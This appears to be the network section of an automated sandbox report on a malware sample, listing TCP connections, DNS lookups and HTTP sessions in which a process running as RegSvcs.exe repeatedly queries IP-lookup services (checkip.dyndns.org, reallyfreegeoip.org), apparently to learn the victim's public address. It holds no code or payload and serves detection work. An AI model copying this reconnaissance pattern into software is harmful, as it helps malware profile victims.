                                          Jan 2, 2025 20:19:52.689007998 CET49752443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:52.692358017 CET4974580192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.693617105 CET4975880192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.697249889 CET8049745193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:52.697369099 CET4974580192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.698359013 CET8049758193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:52.698759079 CET4975880192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.698997974 CET4975880192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.703723907 CET8049758193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:52.804044008 CET44349753188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.806960106 CET49753443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:52.806973934 CET44349753188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.975006104 CET44349753188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.975059986 CET44349753188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:52.975272894 CET49753443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:52.975564003 CET49753443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:52.979429960 CET4975080192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.981185913 CET4976180192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.984455109 CET8049750193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:52.984509945 CET4975080192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.985939026 CET8049761193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:52.986007929 CET4976180192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.986107111 CET4976180192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:52.990869999 CET8049761193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:53.209826946 CET8049758193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:53.211033106 CET49762443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:53.211092949 CET44349762188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:53.211272001 CET49762443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:53.211539030 CET49762443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:53.211553097 CET44349762188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:53.260020018 CET4975880192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:53.461972952 CET8049761193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:53.463340044 CET49767443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:53.463395119 CET44349767188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:53.463463068 CET49767443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:53.463788033 CET49767443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:53.463798046 CET44349767188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:53.510035038 CET4976180192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:53.673124075 CET44349762188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:53.674899101 CET49762443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:53.674933910 CET44349762188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:53.813585043 CET44349762188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:53.813640118 CET44349762188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:53.813736916 CET49762443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:53.814146042 CET49762443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:53.817599058 CET4975880192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:53.818656921 CET4976980192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:53.822586060 CET8049758193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:53.822666883 CET4975880192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:53.823510885 CET8049769193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:53.823590994 CET4976980192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:53.823753119 CET4976980192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:53.828493118 CET8049769193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:53.936458111 CET44349767188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:53.938316107 CET49767443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:53.938335896 CET44349767188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:54.091725111 CET44349767188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:54.091782093 CET44349767188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:54.091830015 CET49767443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:54.094532967 CET49767443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:54.098838091 CET4977380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:54.103646040 CET8049773193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:54.103753090 CET4977380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:54.103944063 CET4977380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:54.108738899 CET8049773193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:54.375389099 CET8049769193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:54.376954079 CET49776443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:54.376971006 CET44349776188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:54.377221107 CET49776443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:54.377595901 CET49776443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:54.377607107 CET44349776188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:54.416265965 CET4976980192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:54.599114895 CET8049773193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:54.600497961 CET49777443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:54.600580931 CET44349777188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:54.600661039 CET49777443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:54.600970984 CET49777443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:54.601000071 CET44349777188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:54.650674105 CET4977380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:54.839061975 CET44349776188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:54.840792894 CET49776443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:54.840831041 CET44349776188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:54.996464014 CET44349776188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:54.996526957 CET44349776188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:54.996665955 CET49776443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:54.997145891 CET49776443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:55.121150017 CET4976980192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:55.121768951 CET4973680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:55.122342110 CET44349777188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:55.153584957 CET49777443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:55.153623104 CET44349777188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:55.286351919 CET44349777188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:55.286407948 CET44349777188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:55.286459923 CET49777443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:55.287054062 CET49777443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:55.379321098 CET4977380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:55.384413958 CET8049773193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:55.384521961 CET4977380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:55.394527912 CET4978380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:55.399363041 CET8049783193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:55.399444103 CET4978380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:55.399588108 CET4978380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:55.404320955 CET8049783193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:56.156508923 CET8049783193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:56.158335924 CET49790443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:56.158397913 CET44349790188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:56.158504009 CET49790443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:56.158725977 CET49790443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:56.158740044 CET44349790188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:56.197519064 CET4978380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:56.648859978 CET44349790188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:56.650895119 CET49790443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:56.650933981 CET44349790188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:56.800009966 CET44349790188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:56.800080061 CET44349790188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:56.800151110 CET49790443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:56.800632954 CET49790443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:56.803942919 CET4978380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:56.805048943 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:56.809010983 CET8049783193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:56.809175968 CET4978380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:56.809964895 CET8049796193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:56.810044050 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:56.810107946 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:56.814896107 CET8049796193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:57.263945103 CET8049796193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:57.265337944 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.265361071 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.265503883 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.265786886 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.265798092 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.306924105 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.720971107 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.724678040 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.724705935 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.872256041 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.872318983 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.872442007 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.872951984 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.877166033 CET4980280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.877247095 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.881987095 CET8049802193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:57.882208109 CET8049796193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:57.882325888 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.882436037 CET4980280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.882436037 CET4980280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.887161970 CET8049802193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:58.545856953 CET8049802193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:58.547339916 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:58.547408104 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:58.547485113 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:58.547807932 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:58.547822952 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:58.588164091 CET4980280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:59.036500931 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:59.038994074 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:59.039055109 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:59.207258940 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:59.207340002 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:59.207433939 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:59.207983017 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:59.401166916 CET4976180192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:59.401324034 CET4980280192.168.2.5193.122.130.0

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 2, 2025 20:19:45.090090990 CET6155853192.168.2.51.1.1.1
                                          Jan 2, 2025 20:19:45.097460032 CET53615581.1.1.1192.168.2.5
                                          Jan 2, 2025 20:19:45.728605032 CET5073053192.168.2.51.1.1.1
                                          Jan 2, 2025 20:19:45.735847950 CET53507301.1.1.1192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jan 2, 2025 20:19:45.090090990 CET192.168.2.51.1.1.10x48c0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                          Jan 2, 2025 20:19:45.728605032 CET192.168.2.51.1.1.10x87b5Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jan 2, 2025 20:19:45.097460032 CET1.1.1.1192.168.2.50x48c0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                          Jan 2, 2025 20:19:45.097460032 CET1.1.1.1192.168.2.50x48c0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                          Jan 2, 2025 20:19:45.097460032 CET1.1.1.1192.168.2.50x48c0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                          Jan 2, 2025 20:19:45.097460032 CET1.1.1.1192.168.2.50x48c0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                          Jan 2, 2025 20:19:45.097460032 CET1.1.1.1192.168.2.50x48c0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                          Jan 2, 2025 20:19:45.097460032 CET1.1.1.1192.168.2.50x48c0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                          Jan 2, 2025 20:19:45.735847950 CET1.1.1.1192.168.2.50x87b5No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                          Jan 2, 2025 20:19:45.735847950 CET1.1.1.1192.168.2.50x87b5No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • reallyfreegeoip.org
                                          • checkip.dyndns.org

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549724193.122.130.0807276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:45.114526033 CET151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:45.569381952 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:45 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 0bf00dbf617257dc04f4df4c7328988f
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                          Jan 2, 2025 20:19:45.573493004 CET127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jan 2, 2025 20:19:45.674526930 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:45 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: cd402f1555efa831d3c51df8c8efea76
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                          Jan 2, 2025 20:19:46.918324947 CET127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jan 2, 2025 20:19:47.021224976 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:46 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 59624faf939fdd7c0974d62f6d84347a
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549729193.122.130.0807276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:47.638384104 CET127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jan 2, 2025 20:19:48.198189974 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:48 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: c23470ebe43e95cc52a7186a773b33bc
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.549732193.122.130.0807276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:48.975334883 CET127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jan 2, 2025 20:19:49.445928097 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:49 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 26282847bd82832f3188bd7508a9094a
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.549734193.122.130.0807620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:49.586551905 CET151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:50.086275101 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:50 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 993842b516ebc0d3c28604af39b9ada9
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                          Jan 2, 2025 20:19:50.089476109 CET127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jan 2, 2025 20:19:50.193069935 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:50 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 171a67158c2631304904e69a2296f55c
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                          Jan 2, 2025 20:19:50.902162075 CET127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jan 2, 2025 20:19:51.119294882 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:51 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 59f00d6e3911ed5d51fedfd8d9101934
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.549736193.122.130.0807276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:50.085854053 CET127OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Jan 2, 2025 20:19:50.570532084 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:50 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 49057de244c330356e9c3ed8a0a9b78e
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.549745193.122.130.0807276C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:51.369352102 CET151OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Jan 2, 2025 20:19:52.042634964 CET321INHTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:51 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 8525e8690d52d7e188dc806ccb06a8b3
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.549750193.122.130.0807620C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jan 2, 2025 20:19:51.772279978 CET127OUTGET / HTTP/1.1
